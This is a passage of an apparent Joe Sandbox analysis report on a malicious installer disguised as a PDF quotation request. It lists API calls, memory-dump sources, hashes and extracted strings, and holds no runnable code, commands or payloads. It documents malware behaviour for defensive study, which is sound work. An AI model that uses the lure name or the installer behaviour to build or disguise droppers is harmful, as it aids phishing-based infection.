                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                  • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                                                  • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                                                  • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                  • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                                                  • Opcode Fuzzy Hash: 7c596801b8e97744870de8fa040c6d0eb9a7113b3dcb71ab6f8aec32acf4c673
                                                                                                                                  • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401D59
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                                                  • wsprintfW.USER32 ref: 00404A1A
                                                                                                                                  • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s
                                                                                                                                  • API String ID: 3540041739-3551169577
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                                  • wsprintfW.USER32 ref: 00406411
                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00406421
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll
                                                                                                                                  • API String ID: 2200240437-2744773210
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                  • lstrlenW.KERNEL32(0040B5F0,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                  • RegSetValueExW.ADVAPI32(?,?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,0040B5F0,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateValuelstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1356686001-0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,?,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,?,759223A0), ref: 0040520F
                                                                                                                                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                                    • Part of subcall function 00405735: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                    • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3585118688-0
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,0040A300,00441800), ref: 004056C6
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056DA
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                                                  • GetLastError.KERNEL32 ref: 004056F9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                  APIs
                                                                                                                                  • DestroyWindow.USER32(?,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402DBB
                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                  • Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
                                                                                                                                  • Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
                                                                                                                                  • Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C
                                                                                                                                  APIs
                                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                                    • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                  • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                                  • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                                  • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                                  • GetTempFileNameW.KERNEL32(0040A300,?,00000000,?,?,?,00000000,0040329E,00441000,00441800,00441800,00441800,00441800,00441800,00441800,004034CC), ref: 00405C92
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                  • String ID: nsa
                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                  • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                                  • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                                  • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                                                                                                                                  • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                                                                                                                                  Strings
                                                                                                                                  • Error launching installer, xrefs: 00405748
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                  • String ID: Error launching installer
                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                  • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                                                                                                                                  • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                                                                                                                                  • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Xaq$Xaq$Xaq$Xaq
                                                                                                                                  • API String ID: 0-4015495023
                                                                                                                                  • Opcode ID: 63ad6b4cc35b8a9d1ea1f0785baf756753222de71ef1d337c05c9d3264cec513
                                                                                                                                  • Instruction ID: 0eef9ea72368b3da1d63d8bb5f94dcf5fa35c704b9f21d67d241d8ff4643175d
                                                                                                                                  • Opcode Fuzzy Hash: 63ad6b4cc35b8a9d1ea1f0785baf756753222de71ef1d337c05c9d3264cec513
                                                                                                                                  • Instruction Fuzzy Hash: 7A316330E0131A9BDFA48FA889403AEB6E6BF94310F154067C415A7355EF30CD81DBA2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                                                                  • API String ID: 0-2351511683
                                                                                                                                  • Opcode ID: 05eba810a8ba63ba32bfbdc426fc8dd71860870b1b01497391347c82080345e8
                                                                                                                                  • Instruction ID: bc50a0f427712a87b55e48a3e10c07234761a8872a407652183948f6b851c875
                                                                                                                                  • Opcode Fuzzy Hash: 05eba810a8ba63ba32bfbdc426fc8dd71860870b1b01497391347c82080345e8
                                                                                                                                  • Instruction Fuzzy Hash: 8001D431740A05CFCBA48E2CC8A0929B3EAAF88772725446BE845CB370DA31DC41C7A0
                                                                                                                                  APIs
                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292987645.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000004.00000002.3292968312.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293006200.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293022869.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000004.00000002.3293049640.000000000045D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                  • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                                                  • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                                                  • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9